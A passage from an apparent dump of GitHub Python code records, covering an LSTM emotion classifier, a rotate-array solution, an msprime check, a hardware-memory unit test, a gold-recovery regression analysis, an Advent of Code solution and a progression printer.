embeddings\\n\")\r\n total_embeddings, total_word2id, total_id2word,total_word_list,=read_total_embeddings(embedding_file, vocab_size)\r\n pre_word_count = get_word_count(pre_train_word_count_file, chat_config.word_count)\r\n emotion_words_dict = read_emotion_words(emotion_words_dir, pre_word_count)\r\n word_list = construct_vocab(total_word_list, emotion_words_dict, chat_config.generic_word_size,chat_config.emotion_vocab_size, FLAGS.unk)\r\n word_dict = construct_word_dict(word_list, FLAGS.unk, FLAGS.start_symbol, FLAGS.end_symbol)\r\n id2words = {idx: word for word, idx in word_dict.items()}\r\n word_unk_id = word_dict[FLAGS.unk]\r\n word_start_id = word_dict[FLAGS.start_symbol]\r\n word_end_id = word_dict[FLAGS.end_symbol]\r\n final_word_list = get_word_list(id2words)\r\n print(\"Read word embeddings!\\n\")\r\n # 读所有的词向量\r\n embeddings = read_word_embeddings(total_embeddings, total_word2id, final_word_list, chat_config.embedding_size)\r\n\r\n print(\"reading training data\\n\")\r\n # 将回答的句子分成单词\r\n train_responses, train_labels, train_lens = read_emotional_response_label_file(train_response_file,\r\n train_label_file,\r\n max_len)\r\n # 补齐responses(补齐成max_len)\r\n train_responses = response_to_indexs(train_responses, word_dict, word_unk_id, max_len)\r\n # train_responses, train_labels什么的都会更新,会把valid的放出去,也就是随机分出验证集\r\n train_responses, train_labels, train_lens, valid_res, valid_labels, valid_lens = \\\r\n split_train_valid_data(train_responses, train_labels, train_lens)\r\n # 处理不能被batch_size整除的train样本集,随机挑一些直接砍掉\r\n train_responses, train_labels, train_lens = align_train_batch_size(train_responses, train_labels, train_lens,\r\n batch_size)\r\n\r\n # 处理不能被batch_size整除的valid样本集,随机挑一些直接砍掉\r\n valid_res, valid_labels, valid_lens = align_train_batch_size(valid_res, valid_labels, valid_lens, batch_size)\r\n\r\n # 读测试数据,和训练集一样的操作\r\n print(\"Read prediction data!\\n\")\r\n test_responses,test_lens = read_test_emotional_response_label_file(test_res_file,max_len)\r\n print(len(test_responses))\r\n\r\n test_responses = response_to_indexs(test_responses, word_dict, word_unk_id, max_len)\r\n\r\n test_length = len(test_responses)\r\n test_responses, test_lens = align_test_batch_size(test_responses,test_lens, batch_size)\r\n\r\n # 定义bi-lstm的模型\r\n print(\"Define model!\\n\")\r\n lstm_emotion_machine = LstmClassifier(embeddings, word_dict, embedding_size, hidden_size, emotion_class, batch_size,max_len, True, session, learning_rate=0.1)\r\n # 开始训练\r\n print(\"training\\n\")\r\n # 一共有多少批训练集\r\n train_batch = int(len(train_responses) / batch_size)\r\n # 一共有多少批验证集\r\n valid_batch = int(len(valid_res) / batch_size)\r\n valid_accs = []\r\n best_valid_acc = -1.0\r\n ckpt_path = os.path.join(FLAGS.checkpoint_path, \"check_path_lstm\")\r\n # 开始训练\r\n for i in range(num_epoch):\r\n print(\"Now train epoch %d!\\n\" % (i + 1))\r\n # 首先随机排序,即打乱顺序\r\n train_responses, train_labels, train_lens = shuffle_train_data(train_responses, train_labels, train_lens)\r\n\r\n for j in range(train_batch):\r\n # 处理输入,处理成能直接喂进去的形式\r\n this_res, this_label, this_len = lstm_emotion_machine.get_train_batch(train_responses, train_labels,\r\n train_lens, j)\r\n # 计算损失\r\n loss = lstm_emotion_machine.train_step(this_res, this_label, this_len)\r\n print(\"epoch=%d, batch=%d, loss=%f\\n\" % ((i + 1), (j + 1), loss))\r\n # 验证集验证开始\r\n labels = []\r\n for k in range(valid_batch):\r\n this_res, this_label, this_len = lstm_emotion_machine.get_train_batch(valid_res, valid_labels,\r\n valid_lens, k)\r\n # 输出预测出来的labels,可能有多个?\r\n this_labels = 
lstm_emotion_machine.predict_step(this_res, this_len)\r\n labels.extend(this_labels)\r\n # 计算准确度\r\n accuracy = compute_accuracy(labels, valid_labels)\r\n print(\"epoch=%d, accuracy=%f\\n\" % ((i + 1), accuracy))\r\n valid_accs.append(accuracy)\r\n # 保存这次的结果\r\n if best_valid_acc < accuracy:\r\n best_valid_acc = accuracy\r\n lstm_emotion_machine.saver.save(lstm_emotion_machine.sess, ckpt_path, global_step=(i + 1) * train_batch)\r\n #lstm_emotion_machine.save_weights(FLAGS.checkpoint_path)\r\n # 取最好的和平均的准确率\r\n best_acc = np.max(valid_accs)\r\n ave_acc = np.average(valid_accs)\r\n print(\"best acc=%f, average acc=%f\\n\" % (best_acc, ave_acc))\r\n\r\n #开始测试\r\n # restore_path = lstm_emotion_machine.saver.last_checkpoints[-1]\r\n # lstm_emotion_machine.saver.restore(lstm_emotion_machine.sess, restore_path)\r\n #\r\n #\r\n # restore_path = lstm_emotion_machine.saver.last_checkpoints[0]\r\n # checkpoint_path = os.path.join(os.path.join(model_path, \"data_utils/check_path_lstm\"), \"check_path_lstm-11728\")\r\n #\r\n # lstm_emotion_machine.saver.restore(lstm_emotion_machine.sess, checkpoint_path)\r\n pred_batches = int(len(test_responses) / batch_size)\r\n total_labels = []\r\n for k in range(pred_batches):\r\n # 处理输入\r\n this_res, this_len = lstm_emotion_machine.get_pred_batch(test_responses, test_lens, k)\r\n # 输出预测的labels\r\n this_labels = lstm_emotion_machine.predict_step(this_res, this_len)\r\n total_labels.extend(this_labels)\r\n\r\n print(\"check here length\")\r\n print(len(test_responses))\r\n print(len(total_labels))\r\n last_ckpt = lstm_emotion_machine.saver.last_checkpoints\r\n print(\"test here\")\r\n print(last_ckpt)\r\n write_labels(pred_label_file, total_labels)\r\n\r\n return lstm_emotion_machine\r\n # print(len(total_labels))\r\n\r\n\r\n\r\n\r\ndef main(_):\r\n with tf.device(\"/gpu:1\"):\r\n sess = tf.Session(config=tf.ConfigProto(\r\n allow_soft_placement=True, log_device_placement=True))\r\n train(FLAGS.config_file,FLAGS.train_response_file, FLAGS.train_label_file, FLAGS.test_response_file, FLAGS.test_label_file,\r\n FLAGS.max_len, FLAGS.word_count_file, FLAGS.vocab_size, FLAGS.embedding_file, FLAGS.embedding_size,\r\n FLAGS.batch_size, FLAGS.num_epoch, FLAGS.hidden_size, FLAGS.emotion_class, FLAGS.pred_label_file,FLAGS.pre_train_word_count_file,FLAGS.emotion_words_dir, sess)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n model_path = os.path.dirname(os.path.dirname(os.path.abspath(\"lstm_classifier.py\")))\r\n data_dir = os.path.join(model_path, \"data\")\r\n\r\n parse = argparse.ArgumentParser()\r\n parse.add_argument(\"--train_response_file\", type=str,\r\n default=os.path.join(data_dir, \"stc_data/test/utt123_trans_CN_jieba.txt\"))\r\n parse.add_argument(\"--train_label_file\", type=str,\r\n default=os.path.join(data_dir, \"stc_data/test/utt123_emo_CN.txt\"))\r\n # parse.add_argument(\"--test_response_file\", type=str,\r\n # default=\"/Users/zhouziyi/Desktop/Lab/Graduate Design/corpus/douban/post.without.txt\")\r\n parse.add_argument(\"--test_response_file\", type=str,\r\n default=os.path.join(data_dir, \"stc_data/test/trans/gen_ex_pre.final.txt\"))\r\n # test label是用于计算测试准确度的,不涉及别的\r\n parse.add_argument(\"--test_label_file\", type=str,\r\n default=os.path.join(data_dir, \"stc_data/train_test/test.label.lstm.filter.txt\"))\r\n parse.add_argument(\"--max_len\", type=int, default=15)\r\n # word_count_file并没有用处\r\n parse.add_argument(\"--word_count_file\", type=str,\r\n default=os.path.join(data_dir, \"emotion_words_human/word.count.7.120.CN.txt\"))\r\n 
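A few lines below, `--unk`, `--start_symbol`, and `--end_symbol` all default to empty strings, as do the `start_symbol`/`end_symbol` constants in `change_file_format`; this looks like angle-bracket tokens stripped by an HTML pass rather than intentional empties. If so, the restored defaults would resemble the following (the exact token spellings are an assumption, not recoverable from the source):

# Assumed reconstruction of the stripped angle-bracket tokens:
parse.add_argument("--unk", type=str, default="<unk>", help="symbol for unk words")
parse.add_argument("--start_symbol", type=str, default="<ss>", help="symbol for response sentence start")
parse.add_argument("--end_symbol", type=str, default="<es>", help="symbol for response sentence end")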
parse.add_argument(\"--vocab_size\", type=int, default=40000)\r\n parse.add_argument(\"--embedding_file\", type=str,\r\n default=os.path.join(data_dir, \"embedding/7_classes_trans_metric.txt\"),\r\n help=\"word embedding file path\")\r\n parse.add_argument(\"--embedding_size\", type=int, default=50)\r\n parse.add_argument(\"--batch_size\", type=int, default=8)\r\n parse.add_argument(\"--num_epoch\", type=int, default=500)\r\n parse.add_argument(\"--hidden_size\", type=int, default=256)\r\n parse.add_argument(\"--emotion_class\", type=int, default=7)\r\n # pred_label_file并没有用处\r\n parse.add_argument(\"--pred_label_file\", type=str, default=os.path.join(data_dir, \"com_data/5-19-check/generated_sentences_2.final_lstm_classifier.txt\"))\r\n parse.add_argument(\"--unk\", type=str, default=\"\", help=\"symbol for unk words\")\r\n parse.add_argument(\"--start_symbol\", type=str, default=\"\", help=\"symbol for response sentence start\")\r\n parse.add_argument(\"--end_symbol\", type=str, default=\"\", help=\"symbol for response sentence end\")\r\n parse.add_argument(\"--learning_rate\", type=float, default=0.1)\r\n parse.add_argument(\"--checkpoint_path\", type=str, default=os.path.join(model_path, \"data_utils/check_path_lstm_ori_ex\"))\r\n # parse.add_argument(\"--checkpoint_path\", type=str, default=os.path.join(model_path, \"data_utils\"))\r\n parse.add_argument(\"--pre_train_word_count_file\", type=str,\r\n default=os.path.join(data_dir, \"emotion_words_human/word.count.7.120.CN.txt\"),\r\n help=\"nlp cc word count file\")\r\n parse.add_argument(\"--emotion_words_dir\", type=str,\r\n default=os.path.join(data_dir, \"emotion_words_human/7_class_CN_120\"),\r\n help=\"emotion words directory\")\r\n parse.add_argument(\"--config_file\", type=str, default=os.path.join(model_path, \"conf/dialogue1.conf\"),\r\n help=\"configuration file path\")\r\n\r\n FLAGS, unparsed = parse.parse_known_args()\r\n tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"slptongji/GERP","sub_path":"data_utils/lstm_classifier.py","file_name":"lstm_classifier.py","file_ext":"py","file_size_in_byte":42240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73291037034","text":"class Solution:\n # Simpler way: find new index for each element based on len and k\n # Since we don't want to lose data, store values in new auxillary array\n # Then, since we are modifying the input array, copy the values over\n # Complexity: Time O(n) Space O(n)\n def rotatee(self, nums: List[int], k: int) -> None:\n L = len(nums)\n aux = [0 for i in range(L)]\n for i in range(L):\n aux[(i + k) % L] = nums[i]\n for i in range(L):\n nums[i] = aux[i]\n\n # Math trick: Reverse array, then reverse array from [0, k) and [k, len)\n # Complexity: Time O(n) Space O(1)\n def reverse(self, nums: List[int], i: int, j: int):\n while (i < j):\n nums[i], nums[j] = nums[j], nums[i]\n i += 1\n j -= 1\n \n def rotate(self, nums: List[int], k: int) -> None:\n L = len(nums)\n if L < 2:\n return\n k %= L\n self.reverse(nums, 0, L - 1)\n self.reverse(nums, 0, k - 1)\n self.reverse(nums, k, L - 1)","repo_name":"jwestfromtheeast/CodingChallenges","sub_path":"python/easy/189RotateArray.py","file_name":"189RotateArray.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40961554485","text":"import msprime\nimport numpy as 
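The rotate-array record above rests on the reversal identity: rotating right by k equals "reverse everything, reverse the first k, reverse the rest." A worked trace plus a usage check (note the first method is misspelled `rotatee`, and the `List` annotations need `from typing import List`):

# [1,2,3,4,5,6,7], k = 3
# reverse all          -> [7,6,5,4,3,2,1]
# reverse first k = 3  -> [5,6,7,4,3,2,1]
# reverse the rest     -> [5,6,7,1,2,3,4]
nums = [1, 2, 3, 4, 5, 6, 7]
Solution().rotate(nums, 3)
assert nums == [5, 6, 7, 1, 2, 3, 4]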
np\nimport sys\nimport timeit\nimport time\nimport struct\n\nprint(msprime.__file__,msprime.__version__)\n\nnodes = msprime.NodeTable()\nedges = msprime.EdgeTable()\n\ng = []\nwith open(sys.argv[1],\"rb\") as f:\n print(sys.argv[1])\n while True:\n a=struct.unpack('i',f.read(4))\n if a[0]==-1:\n break\n t=struct.unpack('d',f.read(8))\n g.append(t[0])\n # for line in f:\n # l = line.rstrip().split(\" \")\n # g.append(float(l[1]))\ntimes = np.array(g)\ntimes -= times.max()\ntimes *= -1.0\n\nnodes.append_columns(time=times,flags=[-1]*len(times))\n\np = []\nc = []\nl = []\nr = []\n\nwith open(sys.argv[2],\"rb\") as f:\n while True:\n pi=struct.unpack('i',f.read(4))\n if pi[0] == -1:\n break\n ci=struct.unpack('i',f.read(4))\n li=struct.unpack('d',f.read(8))\n ri=struct.unpack('d',f.read(8))\n p.append(pi[0])\n c.append(ci[0])\n l.append(li[0])\n r.append(ri[0])\n\nedges.set_columns(parent=p,child=c,left=l,right=r)\n\n\nN=int(sys.argv[3])\n#samples=[i for i in range(len(times)-2*N,len(times))] \nsamples=[i for i in range(0,len(times),132)]\nts=None\n\nA=time.time()\nmsprime.sort_tables(nodes=nodes,edges=edges)\nB=time.time()\nts=msprime.simplify_tables(nodes=nodes,edges=edges,samples=samples)\nC=time.time()\n\nprint(\"Sorting: \",B-A,\"seconds\")\nprint(\"Simplifying: \",C-B,\"seconds\")\n\n\nwith open(sys.argv[4],'w') as f:\n for i in edges:\n f.write(\"{} {} {:.6f} {:.6f}\\n\".format(i.parent,i.child,i.left,i.right,nodes[i.parent].time))\nwith open(sys.argv[5],'w') as f:\n for i in nodes:\n f.write(\"{}\\n\".format(i.time))\n\n\n","repo_name":"molpopgen/fwdpp_experimental","sub_path":"check_fwd_sim_data_with_msprime.py","file_name":"check_fwd_sim_data_with_msprime.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41678057686","text":"import unittest\n\nfrom naps import SimPlatform, SocMemory, axil_read, axil_write, do_nothing, SimSocPlatform\nfrom naps.soc.platform.zynq import ZynqSocPlatform\n\n\nclass SocMemoryTest(unittest.TestCase):\n def test_smoke(self):\n platform = ZynqSocPlatform(SimPlatform())\n\n dut = SocMemory(width=32, depth=128)\n\n def testbench():\n axi = platform.axi_lite_master\n memorymap = platform.memorymap\n for addr in range(128):\n yield from axil_write(axi, 4*addr + 0x40000000, addr)\n for addr in range(128):\n self.assertEqual(addr, (yield from axil_read(axi, 4*addr + 0x40000000)))\n\n platform.sim(dut, (testbench, \"axi_lite\"))\n\n def test_with_driver(self):\n platform = SimSocPlatform(SimPlatform())\n\n dut = SocMemory(width=64, depth=128)\n\n def driver(design):\n for i in range(128):\n design[i] = i * i << 30\n yield from do_nothing(10)\n for i in reversed(range(128)):\n self.assertEqual(design[i], i * i << 30)\n yield from do_nothing(10)\n platform.add_driver(driver)\n\n platform.sim(dut)\n","repo_name":"apertus-open-source-cinema/naps","sub_path":"naps/cores/peripherals/soc_memory_test.py","file_name":"soc_memory_test.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"72"} +{"seq_id":"31489421760","text":"import pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import make_scorer\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.ensemble import RandomForestRegressor\n\n#Импорт данных 
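The msprime script above drives the pre-1.0 tables API (`msprime.NodeTable`, `sort_tables`, `simplify_tables`), which later releases moved into tskit; its `flags=[-1]*len(times)` also presumably stands in for "mark every node a sample", where the proper sample flag is 1. A hedged sketch of the modern tskit equivalent, with made-up toy table contents:

import tskit

tables = tskit.TableCollection(sequence_length=1.0)
child = tables.nodes.add_row(flags=tskit.NODE_IS_SAMPLE, time=0.0)
parent = tables.nodes.add_row(time=1.0)
tables.edges.add_row(left=0.0, right=1.0, parent=parent, child=child)
tables.sort()                     # replaces msprime.sort_tables
tables.simplify(samples=[child])  # replaces msprime.simplify_tables
ts = tables.tree_sequence()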
обучающей выборки\ndf_train=pd.read_csv('gold_recovery_train_new.csv')\ndf_train_clear=df_train.fillna(value=None, method=\"ffill\")\nprint(df_train_clear.isna().sum()*100/len(df_train))\n#Импорт данных тестовой выборки\ndf_test=pd.read_csv('gold_recovery_test.csv')\ndf_test=df_test.fillna(value=None, method=\"ffill\")\nprint(df_test.isna().sum()*100/len(df_test))\n#Импорт данных полной выборки выборки\ndf_full=pd.read_csv('/datasets/gold_recovery_full_new.csv')\ndf_full=df_full.fillna(value=None, method=\"ffill\")\nprint(df_full.isnull().sum()*100/len(df_full))\n\n#анализ параметров, не используемых в тестовой выборке\ndf_traincs=df_train.columns\ndf_testcs=df_test.columns\ndf_diff=[]\nfor train in df_traincs:\n if train not in df_testcs:\n df_diff.append(train)\nprint(df_diff)\n\n#Очистка данных\ndf_train_clear1=df_train\ndf_train_clear1=df_train.dropna()\n\n#Оценка эффективности обогащения\nF=df_train_clear1['rougher.input.feed_au']\nprint(F.isna().value_counts())\nC=df_train_clear1['rougher.output.concentrate_au']\nprint(C.isna().value_counts())\nT=df_train_clear1['rougher.output.tail_au']\nprint(T.isna().value_counts())\nA=C*(F-T)\nprint(A.isna().value_counts())\nB=F*(C-T)\nprint(B.isna().value_counts())\ndf_train_clear1['rougher_recovery']=(A/B)*100\nprint(df_train_clear1['rougher_recovery'].isna().value_counts())\nprint(mean_absolute_error(df_train_clear1['rougher.output.recovery'], df_train_clear1['rougher_recovery']))\n\n#Сравнение концентрации материалов на каждом этапе очистки\nprint(\"------------------------------------------------------\")\nprint(\"Средняя концентрация свинца после флотации\", df_full[\"rougher.output.concentrate_pb\"].mean())\nprint(\"Средняя концентрация свинца после первичного этапа очистки\", df_full['primary_cleaner.output.concentrate_pb'].mean())\nprint(\"Средняя концентрация свинца на выходе\", df_full[\"final.output.concentrate_pb\"].mean())\nprint(\"------------------------------------------------------\")\nprint(\"Средняя концентрация серебра после флотации\", df_full[\"rougher.output.concentrate_ag\"].mean())\nprint(\"Средняя концентрация серебра после первичного этапа очистки\", df_full['primary_cleaner.output.concentrate_ag'].mean())\nprint(\"Средняя концентрация серебра на выходе\", df_full[\"final.output.concentrate_ag\"].mean())\nprint(\"------------------------------------------------------\")\nprint(\"Средняя концентрация золота после флотации\", df_full[\"rougher.output.concentrate_au\"].mean())\nprint(\"Средняя концентрация золота после первичного этапа очистки\", df_full['primary_cleaner.output.concentrate_au'].mean())\nprint(\"Средняя концентрация золота на выходе\", df_full[\"final.output.concentrate_au\"].mean())\n\n#Сравнение распределений размеров гранул сырья\nplt.title(\"Сравнение распределений размеров гранул сырья золота\")\nsns.set(style=\"darkgrid\")\nfig = sns.kdeplot(df_train[\"rougher.output.concentrate_au\"], shade=True, color=\"r\")\nfig = sns.kdeplot(df_train[\"primary_cleaner.output.concentrate_au\"], shade=True, color=\"b\")\nfig = sns.kdeplot(df_train[\"final.output.concentrate_au\"], shade=True, color=\"g\")\nplt.legend(['Флотация', 'Первичная очистка', \"На выходе\" ], loc=1)\nplt.show()\n\nplt.title(\"Сравнение распределений размеров гранул сырья серебра\")\nsns.set(style=\"darkgrid\")\nfig = sns.kdeplot(df_train[\"rougher.output.concentrate_ag\"], shade=True, color=\"r\")\nfig = sns.kdeplot(df_train[\"primary_cleaner.output.concentrate_ag\"], shade=True, color=\"b\")\nfig = 
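# Illustrative sketch, not part of the dataset record above: the gold-recovery
# script computes enrichment efficiency as C*(F-T) / (F*(C-T)) * 100, with F
# the gold share in the feed, C in the concentrate and T in the tails (the
# Russian comments label these the rougher recovery inputs). As a standalone
# function with a worked example:
def recovery(feed, concentrate, tails):
    return concentrate * (feed - tails) / (feed * (concentrate - tails)) * 100

print(recovery(10.0, 40.0, 2.0))  # 40*(10-2) / (10*(40-2)) * 100 ~ 84.2%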
sns.kdeplot(df_train[\"final.output.concentrate_ag\"], shade=True, color=\"g\")\nplt.legend(['Флотация', 'Первичная очистка', \"На выходе\" ], loc=1)\nplt.show()\n\nplt.title(\"Сравнение распределений размеров гранул сырья свинца\")\nsns.set(style=\"darkgrid\")\nfig = sns.kdeplot(df_train[\"rougher.output.concentrate_pb\"], shade=True, color=\"r\")\nfig = sns.kdeplot(df_train[\"primary_cleaner.output.concentrate_pb\"], shade=True, color=\"b\")\nfig = sns.kdeplot(df_train[\"final.output.concentrate_pb\"], shade=True, color=\"g\")\nplt.legend(['Флотация', 'Первичная очистка', \"На выходе\" ], loc=1)\nplt.show()\n\nplt.title(\"Сравнение распределений размеров гранул сырья на выборках\")\nsns.set(style=\"darkgrid\")\nfig = sns.kdeplot(df_train['rougher.input.feed_size'], shade=True, color=\"r\")\nfig = sns.kdeplot(df_test['rougher.input.feed_size'], shade=True, color=\"b\")\nplt.legend(['Обучающая выборка', 'Тестовая выборка'], loc=1)\nplt.show()\n\n#Сравнение концентраций металлов на разных этапах обработки\ndf_train_clear1['input']=df_train_clear1['rougher.input.feed_ag']+df_train_clear1['rougher.input.feed_pb']+df_train_clear1['rougher.input.feed_au']\\\n +df_train_clear1['rougher.input.feed_sol']\ndf_train_clear1['rougher']=df_train_clear1['rougher.output.concentrate_ag']+df_train_clear1['rougher.output.concentrate_pb']+df_train_clear1['rougher.output.concentrate_au']\\\n +df_train_clear1['rougher.output.concentrate_sol']\ndf_train_clear1['black']=df_train_clear1['primary_cleaner.output.concentrate_ag']+df_train_clear1['primary_cleaner.output.concentrate_pb']\\\n +df_train_clear1['primary_cleaner.output.concentrate_au']+df_train_clear1['primary_cleaner.output.concentrate_sol']\ndf_train_clear1['finale']=df_train_clear1['final.output.concentrate_ag']+df_train_clear1['final.output.concentrate_pb']+df_train_clear1['final.output.concentrate_au']\\\n +df_train_clear1['final.output.concentrate_sol']\n#Графическое представление полученных результатов\nfig = plt.subplots(figsize=(20, 7))\nfig = sns.distplot(a=df_train_clear1['rougher'], hist=True, kde=True, rug=False , color=\"r\")\nfig = sns.distplot(a=df_train_clear1['black'], hist=True, kde=True, rug=False , color=\"g\")\nfig = sns.distplot(a=df_train_clear1['finale'], hist=True, kde=True, rug=False , color=\"b\")\nfig = sns.distplot(a=df_train_clear1['input'], hist=True, kde=True, rug=False , color=\"y\")\nplt.legend(['rougher', 'primary', 'final', 'input'], loc=1)\nplt.show()\n#Отброс выброса\ndf_train_clear1=df_train_clear1.query('rougher > 20 & black>20 & finale>20 & input >20')\ndf_train_clear1['final_recovery']=df_train_clear1['final.output.recovery']\ndf_train_clear1=df_train_clear1.query('50 < final_recovery < 95')\nprint(df_train_clear1.shape)\n\n#Статистические показатели обучающей выборки\ndf_train_clear1.boxplot('final.output.recovery')\ndf_train_clear1['final.output.recovery'].describe()\n\n#ML\n#Задание кастомной метрики\ndef smape(A, F):\n return 100/len(A) * np.sum(2 * np.abs(F - A) / (np.abs(A) + np.abs(F)))\n\ntotal_smape=0.25*smape_rougher+0.75*smape_final1\nprint('Итоговое симметричное среднее абсолютное процентное отклонение', total_smape)\n\n#Подготовка фичей и таргетов выборок\ntrain_target1=df_train_clear1['rougher.output.recovery']\ntrain_target2=df_train_clear1['final_recovery']\ntrain_features=df_train_clear1[df_test.columns].drop('date', axis=1)\nprint(train_features.shape)\n\ndf_full_target=df_full[['date','rougher.output.recovery','final.output.recovery']]\ndf_test_ready = df_test.merge(df_full_target, on='date', 
how='left')\ndf_test_ready=df_test_ready.dropna()\n\ntest_features=df_test_ready.drop(['date','rougher.output.recovery', 'final.output.recovery'], axis=1)\ntest_target1=df_test_ready['rougher.output.recovery']\ntest_target2=df_test_ready['final.output.recovery']\nprint(test_features.shape)\n\n#Обучения моделей\n#Линейная регрессия\nmodel_lr =LinearRegression()\nmodel_lr.fit(train_features, train_target1)\nresult=model_lr.predict(test_features)\nsmape1=smape(test_target1, result)\nprint(smape1)\n\nmodel_lr1 =LinearRegression()\nmodel_lr1.fit(train_features, train_target2)\nresult1=model_lr.predict(test_features)\nsmape2=smape(test_target2, result1)\nprint(smape2)\n\n#Случайный лес (подбор параметров вставлять не стал) с кросс-валидацией\nmodel_rougher=RandomForestRegressor(random_state=12345, n_estimators=40, max_depth=1)\nmodel_rougher.fit(train_features, train_target1)\nresult=model_rougher.predict(test_features)\nsmape_rougher=smape(test_target1, result)\nscores_rougher = cross_val_score(model_rougher, test_features, result, cv=5)\nfinal_score = scores_rougher.mean()\nprint(smape_rougher)\nprint(scores_rougher)\n\nmodel_final1=RandomForestRegressor(random_state=12345, n_estimators=40, max_depth=7)\nmodel_final1.fit(train_features, train_target2)\nresult=model_final1.predict(test_features)\nsmape_final1=smape(test_target2, result)\nscores_final = cross_val_score(model_final1, test_features, result, cv=5)\nfinal_score1 = scores_final.mean()\nprint(smape_final1)\nprint(final_score1)\n\n#Инициализация подбора гиперпараметров линейной регрессии\nscores = make_scorer(smape, greater_is_better = False)\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import make_scorer\n\n\ndef lr_gridsearchcv(features, target, scores):\n model = LinearRegression()\n param_grid = {\n 'copy_X': [True, False],\n 'fit_intercept': [True, False],\n 'normalize': [True, False]\n }\n my_scorer = make_scorer(scores, greater_is_better=False)\n CV = GridSearchCV(estimator=model, param_grid=param_grid, cv=5, scoring=my_scorer)\n CV.fit(features, target)\n print('Лучшее значение метрики: {:.2f}'.format(-CV.best_score_))\n print('Лучшие гиперпараметры: ', CV.best_params_)\n return CV.best_params_\nlr_gridsearchcv(train_features, train_target1, smape)\nlr_gridsearchcv(train_features, train_target2, smape)\n\n#Сравнение результатов линейной регрессии с подобранными гиперпараметрами (которыепо сути дефолтные, не зря учил)\nmodel_final=LinearRegression(copy_X=True, normalize = True)\nmodel_final.fit(train_features, train_target2)\nresult1=model_final.predict(test_features)\nsmape_final=smape(test_target2, result1)\nscores_final = cross_val_score(model_final, test_features, result1, cv=5)\nfinal_score1 = scores_final.mean()\nprint(smape_final)\n\n\n#Сравнение полученных результатов с дамми\nfrom sklearn.dummy import DummyRegressor\ndummy_regressor_rougher = DummyRegressor(strategy=\"median\")\ndummy_regressor_rougher.fit(train_features, train_target2)\ndummy_rougher_pred = dummy_regressor_rougher.predict(test_features)\nsmape_dummy_rougher = smape(test_target2, dummy_rougher_pred)\n\nprint(smape_dummy_rougher)\n\ndummy_regressor_final = DummyRegressor(strategy=\"median\")\ndummy_regressor_final.fit(train_features, train_target1)\ndummy_final_pred = dummy_regressor_final.predict(test_features)\nsmape_dummy_final = smape(test_target1, 
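# Illustrative sketch, not part of the dataset record above: smape() as defined
# in Main.py is the symmetric mean absolute percentage error; a quick worked
# example follows. (Note that in the record, total_smape is computed from
# smape_rougher and smape_final1 before those variables are assigned further
# down, so that line only runs if the blocks are reordered.)
import numpy as np

def smape(A, F):
    return 100 / len(A) * np.sum(2 * np.abs(F - A) / (np.abs(A) + np.abs(F)))

print(smape(np.array([100.0, 50.0]), np.array([110.0, 40.0])))
# per element: 2*10/210 ~ 0.095 and 2*10/90 ~ 0.222 -> 100/2 * sum ~ 15.9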
dummy_final_pred)\n\nprint(smape_dummy_final)\n\ntotal_smape=0.25*smape_dummy_rougher+0.75*smape_dummy_final\nprint(total_smape)","repo_name":"PTyneu/Gold","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":12279,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41763357407","text":"# ********************************************* #\n# Advent of Code Day 9 #\n# Trevor Loula #\n# Cedarville University Leaderboard #\n# ********************************************* #\n\n# Sliding Window Two-Sum\n\nimport sys\n\nclass Day9:\n\n def __init__(self, window_size):\n self.lines = list(int(line.strip()) for line in open('input/day-9.txt'))\n self.window_size = window_size\n self.target = 0\n\n @staticmethod\n def two_sum(nums, target):\n for num in nums:\n complement = int(target) - int(num)\n if complement in nums: return [num, complement]\n return False\n\n def part_1(self):\n for i in range(self.window_size, len(self.lines)):\n if not Day9.two_sum(self.lines[i-self.window_size:i], self.lines[i]):\n self.target = self.lines[i]\n return self.target\n print(\"No number without property\")\n\n def part_2(self):\n for lo in range(len(self.lines)):\n cont_sum = 0\n for hi in range(lo, len(self.lines)):\n cont_sum += self.lines[hi]\n if cont_sum == self.target:\n return min(self.lines[lo:hi]) + max(self.lines[lo:hi])\n elif cont_sum > self.target:\n break\n print(\"Contiguous sum not found\")\n\ndef main(args):\n if len(args) != 2:\n print(\"Usage: python day-9.py window_size\")\n\n day_9 = Day9(int(args[1]))\n num_1 = day_9.part_1()\n num_2 = day_9.part_2()\n\n print(\"First number without property:\", num_1)\n print(\"Sum of min and max numbers in contiguous set adding to target:\", num_2)\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"tloula/advent-of-code","sub_path":"day-9.py","file_name":"day-9.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34737494353","text":"print('GERADOR DE PA')\nprint('-'*7)\nprimeiro = int(input('Primeiro termo: '))\nrazao = int(input('Razão: '))\ntermo = primeiro\ncont = 1\nlimite = 11\nwhile cont <= limite:\n print('{} -> '.format(termo),end='')\n termo += + razao\n cont += 1\n if limite == cont:\n l2 = int(input('PAUSE\\nQuantos mais?'))\n limite += + l2\nprint('CONSEGUI PORRA')\n","repo_name":"RaoniSilvestre/Exercicios-Python","sub_path":"mundo-2/ex061b.py","file_name":"ex061b.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6137605349","text":"from pytorch_lightning.utilities import rank_zero_only\nfrom pytorch_lightning.loggers import LightningLoggerBase\nimport pandas as pd\nfrom IPython.display import DisplayHandle\n\nclass TableLogger(LightningLoggerBase):\n def __init__(self, 